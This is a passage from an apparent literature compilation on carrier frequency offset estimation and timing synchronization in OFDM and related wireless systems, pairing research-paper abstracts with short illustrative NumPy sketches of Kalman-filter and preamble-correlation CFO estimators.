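# phasor observations y = [cos(pi*eps), sin(pi*eps)] + noise.
# Toy illustration only; not the formulation used in the cited papers.
import numpy as np

def h(eps):
    return np.array([np.cos(np.pi * eps), np.sin(np.pi * eps)])

def sigma_points(x, P, kappa=2.0):
    """Sigma points and weights for a scalar state (basic unscented transform)."""
    s = np.sqrt((1.0 + kappa) * P)
    pts = np.array([x, x + s, x - s])
    w = np.array([kappa, 0.5, 0.5]) / (1.0 + kappa)
    return pts, w

def ukf_step(x, P, y, q=1e-6, r=1e-2):
    # Predict: random-walk CFO model, mean unchanged, variance grows by q.
    x_pred, P_pred = x, P + q
    # Update with the nonlinear phasor measurement.
    pts, w = sigma_points(x_pred, P_pred)
    Y = np.array([h(p) for p in pts])                    # 3 sigma points -> 3 x 2
    y_mean = w @ Y
    d = Y - y_mean
    S = sum(w[i] * np.outer(d[i], d[i]) for i in range(3)) + r * np.eye(2)
    Pxy = sum(w[i] * (pts[i] - x_pred) * d[i] for i in range(3))
    K = Pxy @ np.linalg.inv(S)                           # Kalman gain (1 x 2)
    x_new = x_pred + K @ (y - y_mean)
    P_new = P_pred - K @ S @ K
    return x_new, P_new

rng = np.random.default_rng(1)
eps_true, x, P = 0.15, 0.0, 0.1
for _ in range(200):
    y = h(eps_true) + 0.1 * rng.normal(size=2)
    x, P = ukf_step(x, P, y)
print("true CFO %.3f, UKF estimate %.3f (subcarrier spacings)" % (eps_true, x))
```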
--- paper_title: Highly Accurate Blind Carrier Frequency Offset Estimator for Mobile OFDM Systems paper_content: For orthogonal frequency division multiplexing (OFDM) communication systems, the orthogonality among subcarriers is lost in mobile applications due to frequency offset resulting from either transmitter-receiver local oscillator differences or Doppler shift caused by mobility. As a direct result, inter-carrier interference (ICI) is observed on each and every subcarrier, leading to significant performance degradation. Many OFDM carrier frequency offset (CFO) estimation schemes exist, classified as either data-aided or blind estimation. Due to their power and bandwidth efficiency, blind estimators have received considerable attention recently. Many blind CFO schemes have been proposed for OFDM systems, some of which are based on power spectrum smoothing, kurtosis-type cost functions and minimum output variance. In this paper, we propose a novel blind CFO estimator based on Minimum Reconstruction Error (MRE). In contrast to other blind CFO estimators, the proposed technique can be used with any constellation scheme, does not require a large number of blocks to reach an acceptable estimation error and provides reliable estimation performance with very low mean square error (MSE). Simulation results in AWGN and multi-path fading channels confirm that the performance of the proposed highly accurate blind CFO estimator is superior when frequency offset or time variation occurs in the channel; the proposed technique outperforms most existing blind CFO estimation methods. --- paper_title: Frequency synchronization and phase offset tracking in a real-time 60-GHz CS-OFDM MIMO system paper_content: The performance of an Orthogonal Frequency-Division-Multiplexing (OFDM)-based 60-GHz system can be strongly degraded due to carrier frequency impairment and Phase Noise (PN). In this paper we present a practical approach to the design of a frequency synchronization and phase offset tracking scheme for a 60-GHz, Non-Line-of-Sight (NLOS) capable wireless communication system. We first analyse the architecture of the 60-GHz system and propose a simple algorithm for Carrier Frequency Offset (CFO) estimation on the basis of numerical investigations. Then, we explore pilot-based and blind tracking methods for mitigation of Residual Frequency Offset (RFO) and Common Phase Error (CPE). Analysis and implementation results on an Altera Stratix III FPGA are also provided. --- paper_title: Pilot-Aided Carrier Frequency Estimation for Filter-Bank Multicarrier Wireless Communications on Doubly-Selective Channels paper_content: Multicarrier modulation techniques are currently the key technology in the area of high-data-rate transmission over wireless fading channels. Their considerable vulnerability to carrier frequency offsets, however, hinders their appealing features and demands adequate countermeasures. This paper contributes a class of frequency estimation algorithms intended for filter bank burst-mode multicarrier transmission over time-frequency selective fading channels. All algorithms are derived from the maximum likelihood principle, exhibit a feedforward structure and are based on the use of pilot symbols scattered throughout the burst. The accuracy of the proposed schemes is investigated in typical mobile wireless scenarios, showing that they outperform maximum likelihood non-data-aided frequency recovery in spite of a substantially lower computational requirement.
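Several entries in this part of the list, including the algebraic CFO estimator that is benchmarked against the Moose and Classen techniques and the pilot-aided maximum-likelihood schemes directly above, build on the classic idea of reading a fractional CFO off the phase of the correlation between two repeated training segments. The sketch below illustrates only that baseline idea; it is not the estimator of any single cited paper, and the preamble length, CFO value and noise level are arbitrary.

```python
# Classic repeated-preamble fractional CFO estimator (Moose / Schmidl-Cox style):
# correlate the two identical halves of a training symbol and read the CFO off
# the correlation phase. Illustrative baseline only; parameters are arbitrary.
import numpy as np

rng = np.random.default_rng(2)
N = 64                                   # samples per training symbol (two halves of N/2)
eps_true = 0.21                          # CFO in units of the subcarrier spacing

half = np.exp(1j * 2 * np.pi * rng.random(N // 2))      # unit-modulus training half
tx = np.concatenate([half, half])
n = np.arange(N)
rx = tx * np.exp(1j * 2 * np.pi * eps_true * n / N)     # apply the CFO
rx += 0.05 * (rng.normal(size=N) + 1j * rng.normal(size=N))

P = np.vdot(rx[:N // 2], rx[N // 2:])    # sum over n of conj(r[n]) * r[n + N/2]
eps_hat = np.angle(P) / np.pi            # unambiguous for |eps| < 1
print("true CFO %.3f, estimate %.3f (subcarrier spacings)" % (eps_true, eps_hat))
```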
--- paper_title: Linear Least Squares CFO Estimation and Kalman Filtering Based I/Q Imbalance Compensation in MIMO SC-FDE Systems paper_content: This paper investigates carrier frequency offset (CFO) estimation and inphase/quadrature (I/Q) imbalance compensation in time-varying frequency-selective channels. We first propose a linear least squares (LLS) CFO estimation approach which has a lower complexity and a higher accuracy than the previous nonlinear CFO estimation methods. We then propose a Kalman filtering based I/Q imbalance compensation approach in the presence of CFO, which demonstrates a good ability to track the channel time variations with a fast convergence speed, by nulling the cyclic prefix (CP) and including the CFO in the state vector of the equivalent channel model. The proposed Kalman filtering based I/Q imbalance compensation approach with associated equalization tracks the time variation with a fast convergence speed. Simulation results show that the proposed compensation approach for CFO and I/Q imbalance provides a bit error rate (BER) performance close to the ideal case with perfect channel state information (CSI), no CFO and no I/Q imbalance. --- paper_title: Reduced-complexity baseband compensation of joint Tx/Rx I/Q imbalance in mobile MIMO-OFDM paper_content: Direct-conversion multiple-input multiple-output orthogonal frequency division multiplexing (MIMO-OFDM) transceivers enjoy high data rates and reliability at practical implementation complexity. However, analog front-end impairments such as I/Q imbalance and high mobility requirements of next-generation broadband wireless standards result in performance-limiting inter-carrier interference (ICI). In this paper, we study the effects of ICI due to these impairments for OFDM with space frequency block codes and spatial multiplexing, derive a generalized linear model and propose a non-iterative reduced-complexity digital baseband joint compensation scheme. Furthermore, we present a pilot scheme for joint estimation of the channel and the I/Q imbalance parameters and evaluate its performance through simulations. Our proposed scheme is effective in estimating and compensating for frequency-independent and frequency-dependent transmit and receive I/Q imbalances even in the presence of a residual frequency offset. --- paper_title: Training-Based Synchronization and Demodulation With Low Complexity for UWB Signals paper_content: In this paper, we propose a low-complexity data-aided (DA) synchronization and efficient demodulation technique for an ultrawideband (UWB) impulse radio system. Depending on the autocorrelation property of a judiciously chosen training sequence, a redundance-included demodulation template (RDT) can be extracted from the received signal by separating, shifting, and realigning two connected portions in the observation window. After constructing the RDT, two receiver designs are available. One approach is to demodulate transmitted symbols by correlating the RDT in a straightforward manner, which does not require the explicit timing acquisition and, thus, considerably reduces the complexity of the receiver. An alternative approach is accomplished with the assistance of a non-RDT (NRDT). The NRDT-based receiver is able to remove the redundant noisy component of the RDT by acquiring timing offset via a simple synchronization scheme, therefore achieving a better bit error rate (BER) performance. 
Both schemes can counteract the effects of interframe interference (IFI) and unknown multipath channels. Furthermore, analytical performance evaluations of the RDT- and NRDT-based receivers are provided. Simulations verify the realistic performance of the proposed receivers in the presence of multiuser interference (MUI) and timing errors. --- paper_title: BER analysis of direct conversion OFDM systems with MRC under channel estimation errors paper_content: In this letter, we calculate an exact closed-form expression for the bit error rate (BER) of orthogonal frequency division multiplexing (OFDM) systems with direct conversion that employ maximal ratio combining (MRC) reception in multipath Rayleigh fading channels, using binary phase-shift keying (BPSK) modulation. We assume a realistic system model where direct current (DC) offset, carrier frequency offset (CFO) and imperfect channel state information (ICSI) are simultaneously considered. Results show the appearance of an irreducible BER floor due to DC offset and ICSI. As a rule of thumb, we provide a simple expression for the maximum DC offset allowable in a direct conversion receiver. --- paper_title: Cluster-Based Differential Energy Detection for Spectrum Sensing in Multi-Carrier Systems paper_content: This paper presents a novel differential energy detection scheme for multi-carrier systems, which can form fast and reliable decisions on spectrum availability even in very low signal-to-noise ratio (SNR) environments. For example, the proposed scheme can reach 90% in probability of detection (PD) and 10% in probability of false alarm (PFA) for SNRs as low as -21 dB, while the observation length is equivalent to two multi-carrier symbol durations. The underlying idea of the proposed scheme is to apply order statistics to the clustered differential energy-spectral-density (ESD) in order to exploit the channel frequency diversity inherent in high data-rate communications. Specifically, to enjoy good frequency diversity, the clustering operation is utilized to group uncorrelated subcarriers, while the differential operation applied to each cluster can effectively remove the noise floor and consequently overcome the impact of noise uncertainty while exploiting the frequency diversity. More importantly, the proposed scheme is designed to be robust to both time and frequency offsets. In order to analytically evaluate the proposed scheme, the PFA and PD for the Rayleigh fading channel are derived. The closed-form expressions show a clear relationship between the sensing performance and the cluster size, which is an indicator of the diversity gain. Moreover, we observe up to a 10 dB performance gain compared to state-of-the-art spectrum sensing schemes. --- paper_title: Iterative Receiver Design With Joint Doubly Selective Channel and CFO Estimation for Coded MIMO-OFDM Transmissions paper_content: This paper is concerned with the problem of turbo (iterative) processing for joint channel and carrier frequency offset (CFO) estimation and soft decoding in coded multiple-input-multiple-output (MIMO) orthogonal frequency-division-multiplexing (OFDM) systems over time- and frequency-selective (doubly selective) channels. In doubly selective channel modeling, a basis expansion model (BEM) is deployed as a fitting parametric model to reduce the number of channel parameters to be estimated.
Under pilot-aided Bayesian estimation, CFO and BEM coefficients are treated as random variables to be estimated by the maximum a posteriori technique. To attain better estimation performance without sacrificing spectral efficiency, soft bit information from a soft-input-soft-output (SISO) decoder is exploited in computing soft estimates of data symbols to function as pilots. These additional pilot signals, together with the original signals, can help to enhance the accuracy of channel and CFO estimates for the next iteration of SISO decoding. The resulting turbo estimation and decoding performance is enhanced in a progressive manner by benefiting from the iterative extrinsic information exchange in the receiver. Both extrinsic information transfer chart analysis and numerical results show that the iterative receiver performance is able to converge fast and close to the ideal performance using perfect CFO and channel estimates. --- paper_title: Carrier frequency offset tracking for constant modulus signalling-based orthogonal frequency division multiplexing systems paper_content: This study presents a blind carrier frequency offset (CFO) tracking algorithm for orthogonal frequency division multiplexing systems with constant modulus signalling. Both single-input single-output and multiple-input multiple-output (MIMO) systems are considered. Based on the assumption that the channel frequency response (CFR) has been estimated by training symbols and keeps constant over one frame duration, we discover that the CFO can be estimated via minimising the power difference between the received signals and the CFR. The polynomial rooting method is exploited to derive a low complexity solution. The expectation and mean-square error of the proposed method are derived mathematically. Besides, the effect of channel estimation error on the performance of CFO tracking is addressed and it is shown that the proposed algorithm is robust to this error. At last, this blind scheme can be applied to a MIMO system with the aid of space time block codes. --- paper_title: Frame detection and timing acquisition for OFDM transmissions with unknown interference paper_content: Frame detection and timing acquisition are challenging tasks in orthogonal frequency-division multiplexing systems plagued by narrowband interference (NBI). Most existing solutions operate in the time domain by exploiting the repetitive structure of a training symbol and suffer from considerable performance loss in the presence of NBI. In this work, a novel solution in which frame detection is accomplished in the frequency domain on the basis of a suitable likelihood ratio test is presented. In order to increase the resilience to NBI, the interference power is treated as a nuisance parameter that is averaged out from the corresponding likelihood functions. The resulting test statistic depends on the fractional carrier frequency offset (CFO), which is easily estimated. An alternative scheme that dispenses from CFO estimation is also proposed. After frame detection, the test statistic is employed as a timing metric to accurately locate the position of the training symbol within the received data stream. Computer simulations indicate that the proposed solutions are remarkably robust to NBI and outperform existing alternatives in a severe interference scenario. The price for this advantage is a substantial increase in the computational burden. 
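The MIMO SC-FDE entry above replaces a nonlinear CFO search with a linear least-squares fit. A generic way to see why such a fit is cheap, sketched below under assumed toy signal parameters (this is not the cited paper's exact formulation), is that after stripping a known pilot the CFO appears as the slope of the unwrapped phase, which ordinary least squares recovers in closed form.

```python
# Linear least-squares CFO estimation from the unwrapped phase slope of a known
# pilot. Toy illustration of the LLS idea, not the cited paper's exact algorithm.
import numpy as np

rng = np.random.default_rng(3)
N = 128
f_true = 0.013                                          # CFO in cycles per sample
pilot = np.exp(1j * 2 * np.pi * rng.random(N))          # known unit-modulus pilot

rx = pilot * np.exp(1j * (2 * np.pi * f_true * np.arange(N) + 0.7))
rx += 0.02 * (rng.normal(size=N) + 1j * rng.normal(size=N))

phase = np.unwrap(np.angle(rx * np.conj(pilot)))        # remove the pilot modulation
slope, _ = np.polyfit(np.arange(N), phase, 1)           # LLS fit: phase ~ 2*pi*f*n + phi0
print("true CFO %.4f, LLS estimate %.4f (cycles/sample)" % (f_true, slope / (2 * np.pi)))
```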
--- paper_title: Autocorrelation Based Coarse Timing with Differential Normalization paper_content: Two novel differential normalization factors, depending on the severity of carrier frequency offset, are proposed for autocorrelation based coarse timing scheme. Compared with the conventional normalization factor based on signal energy, they improve the robustness of the timing metric to signal-to-noise ratio (SNR), improve the mainlobe sharpness of the timing metric and reduce both missed detection and false alarm probabilities. --- paper_title: A Cooperative Scheme for ZP-OFDM with Multiple Carrier Frequency Offsets over Multipath Channel paper_content: In the cooperative communication system, due to the distributed nature of the relay system, multiple carrier frequency offsets (CFOs) at different relays and multipath channels between relays cause the whole cooperative communication channel to be a doubly time-frequency selective channel. Zero-Padding Orthogonal Frequency Division Multiplexing (ZP-OFDM), which has been adopted for some wideband communication standards and applications, possesses a unique linear structure. In this paper, we use a cooperative tall Toeplitz scheme to achieve the full cooperative and multipath diversity, and combat the CFOs simultaneously. Importantly, this full diversity scheme only requires linear equalizers (LEs), such as zero-forcing (ZF) and minimum mean square error (MMSE) receivers, an issue which reduces the system complexity. Theoretical analysis of the proposed cooperative tall Toeplitz scheme is provided based on the analytical upper bound of the channel orthogonality deficiency derived in this paper. The above mentioned theoretical issues are verified by the simulation results as well. --- paper_title: Cyclostationarity-Based Robust Algorithms for QAM Signal Identification paper_content: This letter proposes two novel algorithms for the identification of quadrature amplitude modulation (QAM) signals. The cyclostationarity-based features used by these algorithms are robust with respect to timing, phase, and frequency offsets, and phase noise. Based on theoretical analysis and simulations, the identification performance of the proposed algorithms compares favorably with that of alternative approaches. --- paper_title: An Efficient Time Synchronization Scheme for Broadband Two-Way Relaying Networks Based on Physical-Layer Network Coding paper_content: We present an efficient time synchronization scheme for broadband two-way relaying networks based on two-phase physical layer network coding. Especially, a preamble structure is proposed in this letter for the synchronization. The synchronization approach exploits the preamble in frequency domain and time domain to effectively separate the mixed signals, and jointly estimate timing-offsets and channel parameters, respectively. Numerical results confirm that the suggested method is superior to the conventional scheme, and is very suitable for the synchronization in broadband two-way relaying networks based on two-phase physical layer network coding. --- paper_title: Jamming Rejection Using FFH/MFSK ML Receiver Over Fading Channels With the Presence of Timing and Frequency Offsets paper_content: The composite effect of hostile multitone jamming and partial-band noise jamming on bit-error rate (BER) performance of a fast frequency-hopped M-ary frequency-shift-keying system is studied over Rayleigh fading channels in the presence of timing and frequency offsets. 
The maximum-likelihood (ML) diversity-combining method is employed to improve the BER performance of the system. An analytical BER expression for the proposed ML receiver is derived. The analytical results, validated by computer simulation, show that the proposed ML receiver can suppress the composite hostile jamming more effectively than some existing conventional diversity-combining receivers. The ML receiver is also found to be robust against inaccurate estimation of the required side information. --- paper_title: Timing-delay and frequency-offset estimations for initial synchronisation on time-varying Rayleigh fading channels paper_content: A technique for timing-delay and frequency-offset estimations that takes advantage of a single dual-chirp preamble burst operating in frequency-non-selective fading environments is proposed. As the shape of the autocorrelation function of the dual-chirp signal does not essentially change with different values of frequency offset, the proposed technique provides a maximum-likelihood (ML) timing-delay estimation by exploiting only one pair of pseudo-noise matched filters (PN MFs), instead of conventionally exploiting a continuum of MFs, therefore approaching the Miller-Chang bound (MCB) in the timing-delay estimation with a channel gain and an initial phase error as nuisance parameters. Using the transform invariance property of the dual-chirp signal, the proposed technique estimates a frequency offset by exploiting frequency-domain PN MFs, therefore approaching the MCB in the frequency-offset estimation. The proposed technique accomplishes ML timing-delay and frequency-offset estimations to attain the performance bounds. The advantages of the proposed technique are verified by rigorous statistical analysis in conjunction with comprehensive computer simulations. --- paper_title: One-Shot Blind CFO and Channel Estimation for OFDM With Multi-Antenna Receiver paper_content: In this paper, we design a new blind joint carrier frequency offset (CFO) and channel estimation method for orthogonal frequency-division multiplexing (OFDM) with a multi-antenna receiver. The proposed algorithm requires only one received OFDM block and thus belongs to the category of one-shot estimation methods. Other advantages of the proposed algorithm include 1) it supports fully loaded data carriers and is thus spectrally efficient; 2) the channel from the transmitter to each receive antenna can be blindly estimated with only a scaling ambiguity; and 3) the algorithm outperforms existing methods. Moreover, we derive the Cramer-Rao bounds (CRBs) of joint CFO and channel estimation in closed form. Numerical results not only show the effectiveness of the proposed algorithm but also demonstrate that its performance is close to the CRB. --- paper_title: Robust Timing and Frequency Synchronization for OFDM Systems paper_content: This paper deals with timing and frequency synchronization in orthogonal frequency-division multiplexing (OFDM) systems. A robust multistage scheme that works in the time domain, independent of the preamble structure, is proposed. After coarse-timing estimation, joint timing and integer frequency synchronization is performed. Then, fractional frequency correction is carried out, and finally, fine-timing estimation completes the synchronization process. The new timing estimation method is flexible and can be adjusted according to the degree of channel distortion.
Furthermore, frequency synchronization is efficiently accomplished with an estimation range that is as large as the bandwidth of the OFDM signal. The performance of the proposed method is evaluated in terms of the mean square error. The results indicate that the new method significantly improves performance compared with the previous methods. --- paper_title: Blind Carrier Frequency Offset Estimation for OFDM Systems with Constant Modulus Constellations paper_content: This paper proposes a blind carrier frequency offset (CFO) estimation scheme for OFDM systems. In the proposed scheme, the covariance matrix of the received signal is obtained through the circular shifts of OFDM blocks in the time-domain. From the fact that the covariance matrix has a banded structure in the absence of CFO, we estimate CFO through minimizing the powers of the elements that are outside the band. We show that the proposed scheme is better than the conventional schemes through simulations. --- paper_title: Fast Kalman Equalization for Time-Frequency Asynchronous Cooperative Relay Networks With Distributed Space-Time Codes paper_content: Cooperative relay networks are inherently time and frequency asynchronous due to their distributed nature. In this correspondence, we propose a transceiver scheme to combat both time and frequency offsets for cooperative relay networks with multiple relay nodes. At the relay nodes, a distributed linear convolutive space-time coding is adopted, which has the following advantages: 1) Full cooperative diversity can be achieved using a minimum mean square error (MMSE) or MMSE decision feedback equalizer (MMSE-DFE) detector, instead of a maximum-likelihood receiver when only time asynchronism exists. 2) The resultant equivalent channel possesses some special structure, which can be exploited to reduce the equalization complexity at the destination node. By taking full advantage of such a special structure, fast Kalman equalizations based on linear MMSE and MMSE-DFE are proposed for the receiver, where the estimation of the state vector (information symbols) can be recursively taken and become very computationally efficient, compared with direct equalization. The proposed scheme can achieve considerable diversity gain with both time and frequency offsets and applies to frequency-selective fading channels. --- paper_title: Space–Frequency Convolutional Coding for Frequency-Asynchronous AF Relay Networks paper_content: In this paper, we design a space-frequency (SF) convolutional coding scheme for amplify-and-forward (AF) relay networks that contain multiple distributed relay nodes. The frequency-asynchronous nature of the distributed system is considered in our design. Orthogonal frequency-division multiplexing (OFDM) modulation is adopted, which is robust to certain timing errors. We exploit the signal space diversity technique and employ an extended cyclic prefix (CP) at the source node. The relay nodes need to perform only simple operations, e.g., convolution and amplification, and they need no information about the channels and the frequency offsets. Attributed to the extended CP, the multiple frequency offsets can directly be compensated at the destination. We further prove that both spatial and multipath diversity can be achieved by the proposed scheme. Numerical results are provided to corroborate the proposed studies. 
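The fast Kalman equalization entry above treats the transmitted symbol vector as the state and obtains MMSE estimates through Kalman-style recursions that exploit the structure of the equivalent channel. The sketch below shows only the basic identity being exploited: a single Kalman measurement update on the linear model y = Hx + n reproduces the familiar LMMSE equalizer. It is a generic textbook relation, not the fast recursive algorithm of the cited paper, and the matrix sizes and noise level are arbitrary.

```python
# A single Kalman measurement update on y = H x + n coincides with the LMMSE
# equalizer x_hat = P H^H (H P H^H + R)^{-1} y. Generic identity for illustration;
# the cited paper's contribution is a fast, structured recursion for this update.
import numpy as np

rng = np.random.default_rng(4)
K, M = 4, 6                                   # number of symbols, receive samples
H = (rng.normal(size=(M, K)) + 1j * rng.normal(size=(M, K))) / np.sqrt(2)
x = (2 * rng.integers(0, 2, K) - 1) + 1j * (2 * rng.integers(0, 2, K) - 1)   # QPSK
sigma2 = 0.05
y = H @ x + np.sqrt(sigma2 / 2) * (rng.normal(size=M) + 1j * rng.normal(size=M))

P = 2.0 * np.eye(K)                           # prior symbol covariance (QPSK energy 2)
R = sigma2 * np.eye(M)                        # noise covariance

S = H @ P @ H.conj().T + R                    # innovation covariance
G = P @ H.conj().T @ np.linalg.inv(S)         # Kalman gain (prior mean is zero)
x_mmse = G @ y                                # LMMSE symbol estimates
print("hard decisions:", np.sign(x_mmse.real) + 1j * np.sign(x_mmse.imag))
print("transmitted:   ", x)
```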
--- paper_title: Improved CIR-Based Receiver Design for DVB-T2 System in Large Delay Spread Channels: Synchronization and Equalization paper_content: This paper proposes to implement an improved orthogonal frequency division multiplexing (OFDM) receiver by utilizing channel impulse response (CIR)-based synchronization and sparse equalization for a DVB-T2 system operating in both the single-input single-output (SISO) and multi-input single-output (MISO) transmission modes. First, the proposed OFDM receiver performs a pilot-aided CIR estimation after a coarse symbol timing recovery (STR). Then, the proposed CIR-based fine STR compensates for a false symbol timing offset (STO). In particular, the fine STR resolves an ambiguity effect of the CIR, which is the main problem caused by a false coarse STO in exploiting the CIR. Upon completion of the fine synchronization, the proposed CIR-based sparse equalization is performed in order to minimize the noise and interference effects by shifting or selecting a basic frequency interpolation (FI) filter according to an echo delay (phase) or the maximum delay spread, respectively. Performance evaluations are carried out in large delay spread channels in which the maximum delay spread is either shorter or longer than the guard interval (GI). It is shown that the proposed receiver is not only capable of estimating the fine STO but also of effectively minimizing the noise effects. In particular, the performance gain in a single pre-echo channel whose delay exceeds the GI is remarkable as compared with a conventional receiver. --- paper_title: MCRB for Timing and Phase Offset for Low-Rate Optical Communication with Self-Phase Modulation paper_content: We derive the modified Cramer-Rao bound (MCRB) for symbol timing and phase offset estimation in the presence of nonlinear self-phase modulation (SPM) in a dispersion-compensated long-haul optical fiber link with coherent detection at data rates below 10 Gigabaud. In the presence of a low-pass filter at the receiver front-end, we find that SPM degrades the MCRB. Moreover, depending on the pulse shape, SPM induces underdamped oscillation on the bounds. --- paper_title: Design and Analysis of Data-Aided Coarse Carrier Frequency Recovery in DVB-S2 paper_content: An improved data-aided (DA) frequency error detector (FED) and a frequency lock detector are proposed for the Digital Video Broadcasting Satellite Second Generation (DVB-S2) system under large frequency offsets. Computer simulation results show that the proposed error detector can increase the frequency acquisition range and decrease the acquisition time without any increase in complexity. Its closed-loop normalized frequency root mean square error (RMSE) improves by at least 1.5 dB compared with that of the conventional error detector. The proposed lock detector shows good lock indication. Its modified version can save more symbols to indicate the locking status. --- paper_title: Correction of the CFO in OFDM Relay-Based Space-Time Codes paper_content: In this paper, we analyze the impact of carrier frequency offset (CFO) on the performance of orthogonal frequency division multiplexing (OFDM) transmission employing space-frequency coding over relay channels. The challenge in such systems lies in the difficulty of canceling the interference resulting from the different CFOs that correspond to the relays involved in the transmission. We first analyze the CFO correction schemes and examine their impact on the achievable information rates.
Further, we analyze the interference cancellation (IC) technique based on the so-called turbo principle, which jointly detects and decodes the received data. The increase in achievable rates due to IC is assessed via a parametric description of the iterative process. We provide examples that demonstrate the efficacy of the proposed scheme, and numerical results are contrasted with theoretical performance limits. --- paper_title: ICI Mitigation for OFDM Using PEKF paper_content: Orthogonal frequency division multiplexing (OFDM) is widely known as a promising broadband wireless communication technology due to its high spectral efficiency and robustness to multipath interference. However, the inter-carrier interference (ICI) caused by Doppler frequency offset is an important issue for OFDM in high-mobility scenarios. In this paper, methods to mitigate ICI in OFDM systems are investigated, and a novel ICI mitigation method using a planar extended Kalman filter (PEKF) is proposed to reduce the ICI effects. Simulation results demonstrate that the ICI mitigation method proposed in this letter outperforms traditional ICI mitigation methods. --- paper_title: Multiple CFO Mitigation in Amplify-and-Forward Cooperative OFDM Transmission paper_content: In cooperative orthogonal frequency division multiplexing (OFDM) systems, accurate frequency synchronization is critical to achieving any potential gains brought by the cooperative operation. The carrier frequency offsets (CFOs) present among multiple nodes (source, relays and destination) are more difficult to tackle than the single CFO problem in point-to-point systems. Multiple CFOs cause phase drift, inter-carrier interference (ICI) and inter-block interference (IBI) in the received signal. This paper deals with the CFO-induced interference mitigation problem in distributed space-time block coded (STBC) amplify-and-forward (AF) cooperative OFDM systems. We propose a two-step approach to recover the phase distortion and suppress the ICI and IBI using low-complexity methods to achieve high performance. The first step is time-domain (TD) compensation and the second step is frequency-domain (FD) decoding. Two TD compensation schemes are proposed, i.e., IBI-removal and ICI-removal. The IBI-removal scheme decouples the two blocks of one STBC codeword completely and then decodes the ICI-degraded blocks individually. The ICI-removal scheme removes ICI first, and the subsequent decoding requires joint decoding of the two blocks. Simulation results show that the IBI-removal scheme, which is of lower complexity, performs well with small CFOs. For large CFOs, the ICI-removal scheme with modified iterative joint maximum likelihood decoding (MIJMLD) outperforms the other schemes. --- paper_title: New joint algorithm of blind doppler parameters estimation for high-order QAM signals paper_content: To address the difficulty of blind Doppler parameter estimation for QAM signals in satellite communication on-the-move (SCOTM) systems, a new joint algorithm for blind Doppler frequency and Doppler-rate estimation based on cyclic-statistical tests and phase differences is proposed. By detecting one of the cyclic frequencies of QAM signals, located at the quartic frequency offset, the Doppler frequency is effectively estimated; meanwhile, a data division method is exploited to calculate the Doppler rate. Finally, a phase-locked loop (PLL) is proposed to make the estimation more accurate.
All-sided Monte Carlo simulations are employed to confirm the theoretical analysis, simulation results indicate that this algorithm can track time-varying frequency of the QAM signals accurately. --- paper_title: Frequency Offset Invariant Multiple Symbol Differential Detection of MPSK paper_content: Multiple-symbol differential detection (MSDD) of differentially encoded phase-shift keying (PSK) signals in the presence of random frequency variation and additive white Gaussian noise is studied. It is shown that frequency variation distorts the transmitted signal through attenuating its amplitude and introducing a time-varying phase shift to the information symbols. A double differential PSK (DDPSK) modulation scheme is then introduced and a MSDD for detecting DDPSK signals in the presence of frequency offset is proposed. It is shown that the proposed receiver is robust to the distortions caused by the random frequency variation. A lower bound on the error probability of the proposed MSDD receiver is also derived and compared to that of an autocorrelation demodulator for the case where the observation interval approaches infinity. --- paper_title: SNR Estimation in a Non-Coherent BFSK Receiver With a Carrier Frequency Offset paper_content: This correspondence deals with the problem of estimating average signal-to-noise ratio (SNR) for a communication link employing binary frequency shift keying (BFSK) in the presence of a carrier frequency offset (CFO). The transmitted symbols are corrupted by Rayleigh fading and additive white Gaussian noise (AWGN). We treat the CFO as a nuisance parameter and estimate it using a data statistics based estimator. This estimate is then used to design a maximum likelihood (ML) estimator to get the estimates of SNR. We also derive the Cramer-Rao bound (CRB) for the estimators and have shown the performance of both the data-aided and non-data-aided estimators. --- paper_title: Semiblind Iterative Receiver for Coded MIMO-OFDM Systems paper_content: In this paper, a semiblind iterative receiver is proposed for coded multiple-input-multiple-output orthogonal frequency-division multiplexing (MIMO-OFDM) systems. A novel iterative extended soft-recursive least square (IES-RLS) estimator for joint channel and frequency offset estimation is introduced. Extrinsic bit information obtained from the channel decoder and expected symbol decisions obtained from the demodulator are simultaneously exploited by the IES-RLS. The proposed receiver combines the MIMO data demodulator, the proposed channel estimator, and the channel decoder in an iterative manner to yield an improved bit error rate (BER) performance. To arrive at a feasible algorithm, the first-order linearization of the received vector signal with respect to the frequency offset is used in the IES-RLS channel estimator. The BER performance, a constellation-constrained mutual information analysis, and an EXIT chart analysis are used to verify the effectiveness of the proposed receiver. Simulation results show the superiority of the proposed semiblind receiver, compared with conventional semiblind receivers. --- paper_title: Detection of cooperative OFDM signals in time-varying channels with partial whitening of intercarrier interference paper_content: Cooperative communication can yield spatial diversity gains, but its performance can also suffer severely from the multiple carrier frequency offsets (MCFOs) induced by high-speed relative motion, in addition to Doppler spread. 
In orthogonal frequency-division multiplexing (OFDM) systems, such performance degradation arises as a result of intercarrier interference (ICI). We have shown previously that, in conventional non-cooperative communication, certain ICI components (called residual ICI) display high normalized autocorrelation and a partial whitening of the residual ICI can significantly benefit OFDM signal detection. In this work, we show that similar whitening can also be employed in cooperative communication to address the MCFO issue mentioned above. As an illustration, we simulate a distributed spatial-frequency block coding (SFBC) OFDM system subject to highly disparate MCFOs, where in the receiver we perform partial whitening of the residual ICI followed by maximum-likelihood sequence estimation (MLSE). The results show that the proposed method can comfortably accommodate a maximum MCFO span well exceeding one subcarrier spacing. --- paper_title: Fractional timing offset and channel estimation for MIMO OFDM systems over flat fading channels paper_content: This paper addresses the problem of fractional timing offset and channel estimation in Multiple input Multiple output orthogonal frequency division multiplexing (MIMO OFDM) systems. The estimators have been derived assuming a flat fading channel and using the maximum likelihood criterion. Closed form Cramer Rao bound (CRB) expressions for fractional timing offset and channel response are also derived. Simulation results have been used to cross-check the accuracy of the proposed estimation algorithm. --- paper_title: Maximal power path detection for OFDM timing-advanced synchronization schemes paper_content: Fine timing estimation in timing synchronization scheme of orthogonal frequency division multiplexing systems gives an estimate of symbol starting time index corresponding to the path with maximal power within an interval suggested by coarse timing stage. The actual starting index fed to the following stages is brought forward by an amount that should be adaptive to the estimated index to optimize system performance. In this paper, a method of detecting the estimated starting time index of path with maximal power in channel impulse response is proposed based on conventional preamble with repetitive structure. To deal with the adverse effect of fractional timing offset on the detection metric, we propose a preamble composed of cyclic-shifted parts and the accompanying fine timing and detection scheme. Simulation with time-varying wireless channel shows the detection methods makes use of the time diversity provided by time-varying paths and has good error performance. The scheme with proposed preamble further reduces probability of error detection with the diversity in fractional timing offset provided inherently in the parts of preamble. --- paper_title: A Message Passing Approach to Joint Channel Estimation and Decoding with Carrier Frequency Offset in Time Selective Rayleigh Fading Channel paper_content: This paper presents a message passing approach to joint channel estimation, data detection and decoding over time-selective Rayleigh fading channel with residual carrier frequency offset (CFO). The proposed algorithm utilizes the sum product algorithm (SPA) implemented on a factor graph (FG) representing the 